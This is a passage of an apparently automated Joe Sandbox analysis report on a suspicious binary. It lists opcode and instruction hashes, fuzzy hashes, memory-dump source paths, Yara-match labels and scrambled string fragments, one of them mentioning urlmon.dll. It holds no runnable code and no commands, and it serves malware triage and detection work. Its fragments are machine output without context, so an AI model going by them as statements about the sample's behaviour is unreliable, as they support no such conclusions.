                                                                        • Opcode ID: 160b7acae23fb1581e619454387592f53d2d78e977d5b50a8b49934407a36916
                                                                        • Instruction ID: 13ac75bfb71e10339da4c47009948ff910d2b67a39b827bef7a7fce2c73d132b
                                                                        • Opcode Fuzzy Hash: 160b7acae23fb1581e619454387592f53d2d78e977d5b50a8b49934407a36916
                                                                        • Instruction Fuzzy Hash: DC12E274E05229CBEF28CF5AC8547DDBBB2BF49308F1481DAD0596B281CBB55A86CF41
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6$O$S$\$s
                                                                        • API String ID: 0-3854637164
                                                                        • Opcode ID: b7d0034783b993231ae93bba56965397c5b8b96306e4b5aa6429389a8463abe2
                                                                        • Instruction ID: 538b45e0f0376f068a73f7d2d299d0b639af996c07aecda6ba393ec88d989b75
                                                                        • Opcode Fuzzy Hash: b7d0034783b993231ae93bba56965397c5b8b96306e4b5aa6429389a8463abe2
                                                                        • Instruction Fuzzy Hash: 9D51A276D01318AFDB10DFD8DC45EEAB3B8EF98311F1481A9E9095B141E7749A44CBA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "1$~!
                                                                        • API String ID: 0-4146445991
                                                                        • Opcode ID: 639cc635f774ca0338b75a683a153f6e21b4ced9507b621540147d22da56499b
                                                                        • Instruction ID: 87ae8fc5134320652be0a2c674fd7e8aa7033cd512aed164f82479f42d610030
                                                                        • Opcode Fuzzy Hash: 639cc635f774ca0338b75a683a153f6e21b4ced9507b621540147d22da56499b
                                                                        • Instruction Fuzzy Hash: 4701D7B6C01218AF9B40EFE9D9419EEBBF8AB1C200F14466AD515F6200F7705A048FA4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "
                                                                        • API String ID: 0-1165748306
                                                                        • Opcode ID: 9a43477422ecfde0ed53a9224819f6ab075015e11c3c32de38f19afbf712c515
                                                                        • Instruction ID: b08473356a1565282ba2adf4e9a459bdf2a4457928648b0fbfa27c26534cf810
                                                                        • Opcode Fuzzy Hash: 9a43477422ecfde0ed53a9224819f6ab075015e11c3c32de38f19afbf712c515
                                                                        • Instruction Fuzzy Hash: 3321FEB6D01219AF8B00DFE9D9419EFB7F9EF88610F14426AE915E7204E7719A148BE0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6r
                                                                        • API String ID: 0-1993249690
                                                                        • Opcode ID: 5a475c1fd64906f5f025767121e17dd43e83d4b976390659b15a8ec84352b1bd
                                                                        • Instruction ID: 7d7ae173bdacedf5e1d3b4cc991fe0064c412507b162883206efc08fd083e23b
                                                                        • Opcode Fuzzy Hash: 5a475c1fd64906f5f025767121e17dd43e83d4b976390659b15a8ec84352b1bd
                                                                        • Instruction Fuzzy Hash: 501112B6D0121CAF9B00DFE9D8419EEB7F9EF4D210F14416AE909E7200E7759A05CBE1
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 172d40cec3b3a5eac5f770f6a501fa752952d69f340a6b9c25a6cf4fc7e51e65
                                                                        • Instruction ID: c1eaf0192706fdd96e55a1e440824f4768159552263ada19f1138353c69f631c
                                                                        • Opcode Fuzzy Hash: 172d40cec3b3a5eac5f770f6a501fa752952d69f340a6b9c25a6cf4fc7e51e65
                                                                        • Instruction Fuzzy Hash: C14138B1D11218AFDB00DF99D881AEEBBBCEF4D710F10415AFA14E6240E3B49A45CBA4
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cf6ed1507c048202a8380901b20853abf16bc6de9ff7b6f9047b8a115ef48fb3
                                                                        • Instruction ID: 2a88c1a99144cce244c4c9546d3b2373a51666f61c0c7bcaf174af2803639f4c
                                                                        • Opcode Fuzzy Hash: cf6ed1507c048202a8380901b20853abf16bc6de9ff7b6f9047b8a115ef48fb3
                                                                        • Instruction Fuzzy Hash: 5F31E7B5A00609AFDB14DF99DC41EEFB7B9EF8C300F108619F918AB241D774A911CBA5
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5d70121d21914185a18db6d01ed80ca7d508067f521cbbc7796229021d8daec4
                                                                        • Instruction ID: 8700cad35bd02ff72d3ad2da282414a3f3fe716cb0e90ab233098cde73d760b8
                                                                        • Opcode Fuzzy Hash: 5d70121d21914185a18db6d01ed80ca7d508067f521cbbc7796229021d8daec4
                                                                        • Instruction Fuzzy Hash: 202127B5A00609ABDB10DF68CC41EEBB7B8EF88300F10461DF9189B241DB74A911CBA5
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 25b18df5678153bc5923fa7573696ab297a4478d8ab3a4e71ffa8f91d7ab67c5
                                                                        • Instruction ID: b647f17ab1e6d9e05105fa808c7f57418ab576b71b42d6ed6781a9e233a1a199
                                                                        • Opcode Fuzzy Hash: 25b18df5678153bc5923fa7573696ab297a4478d8ab3a4e71ffa8f91d7ab67c5
                                                                        • Instruction Fuzzy Hash: 8E11A3763803057BF320DE598C82FAB336C9B98B51F244014FB08AE2C1DAA4F8114AB5
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 46a6bf4ad95f33546e795f44d6ff258994b1487d7f7f38bc391b9097c11bbe26
                                                                        • Instruction ID: 733a0325996c91185789929f9c37a11d938034f1367cda63e20b7bf4d5b30a8e
                                                                        • Opcode Fuzzy Hash: 46a6bf4ad95f33546e795f44d6ff258994b1487d7f7f38bc391b9097c11bbe26
                                                                        • Instruction Fuzzy Hash: 7F119075901309ABE720EB68CC41FEBB3BCEF89700F10465EF9189B241DB7569118BA5
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8cf869b84da2e677cde3e514bf77ca522b6e9b483428207a7ca8a5e1cae373bf
                                                                        • Instruction ID: ee2a8602a82b1b580b93730e11358a49a2b6f4af96866633311d4ba2d1923511
                                                                        • Opcode Fuzzy Hash: 8cf869b84da2e677cde3e514bf77ca522b6e9b483428207a7ca8a5e1cae373bf
                                                                        • Instruction Fuzzy Hash: 80116075A01705ABE720EF64CC41FEB73BCEF89700F10461DF9199B241DB7569118BA5
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                                        • Instruction ID: 2442d230d8c047f8f953507cbbaad554c33ae06e2d962abecfcf2566567bd37c
                                                                        • Opcode Fuzzy Hash: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                                        • Instruction Fuzzy Hash: CC0180B6205648BBCB54DF9DDC80EDB77ADAF8C714F508209BA19E7241D630FC518BA4
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 872b5861ad906b79e2e7362d2992326f6859f65e7f74ac74b166600d9d952870
                                                                        • Instruction ID: a6d710b386ac1b975e62fa54da4da12d186667710a6c6147722c77cddc990928
                                                                        • Opcode Fuzzy Hash: 872b5861ad906b79e2e7362d2992326f6859f65e7f74ac74b166600d9d952870
                                                                        • Instruction Fuzzy Hash: CDF0BB7350531A67D714AF5DFC80B96F79CEB89230F340526F95C8B282DB35D4528790
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 25ecb6bf2a448980e5a57064e2dd1879b49d137cb7a586a0f03e4685d1d0a6e8
                                                                        • Instruction ID: e91534f27f336da9ccba6ef51412b9c7fe5e306ae56aeffad2e6716928240e9d
                                                                        • Opcode Fuzzy Hash: 25ecb6bf2a448980e5a57064e2dd1879b49d137cb7a586a0f03e4685d1d0a6e8
                                                                        • Instruction Fuzzy Hash: 62F0F6758103186EEF10EBE5CC45EEA73389F88311F008395E9086A180FB3049458BA6
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4691c96d8d81143b437ca4f97799bd03263fa4e70748146f5b0961e75674bf37
                                                                        • Instruction ID: 4870cc2224e61f0274882ced3c2ce6d57e3d249b60edc7d0879843c16ba829c0
                                                                        • Opcode Fuzzy Hash: 4691c96d8d81143b437ca4f97799bd03263fa4e70748146f5b0961e75674bf37
                                                                        • Instruction Fuzzy Hash: 70F0F876204205BBDB10EF99DC81EDB77ACEFC8754F008509FA18AB241D770B9258BB4
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: be98c509030c2ea581b490eed3ebf59809605963665b9a2a60d9c613e3bd7c53
                                                                        • Instruction ID: 1f13437fb9674467ba4384879a3ec94c0124d372a082af47f4100b20261c25eb
                                                                        • Opcode Fuzzy Hash: be98c509030c2ea581b490eed3ebf59809605963665b9a2a60d9c613e3bd7c53
                                                                        • Instruction Fuzzy Hash: 9FF08275C15209EBDB14CF68D841BDDBBB9EB04320F1087A9E824DB280E73497548781
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                                        • Instruction ID: 59c5b79bb53155f1227772a6ffe7bd62d583245cce8dd0addd2f93501c28d3a5
                                                                        • Opcode Fuzzy Hash: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                                        • Instruction Fuzzy Hash: 34E032B6204204BBD714EE98DC40EEB77ACEF88750F00440AF908AB281D630BA208AB4
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Strings
                                                                        • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                        • String ID: "#CO$@Z\X$A\YO$A^[^$G$';$G7^^$ZA_A$ZA_O$Z\XA$Z\XA\Y$\Y$^V^Y$o
                                                                        • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                        • String ID: .$P$e$i$m$o$r$x
                                                                        • String ID: $i$l$o$u
                                                                        • String ID: $e$k$o
                                                                        • String ID: $e$h$o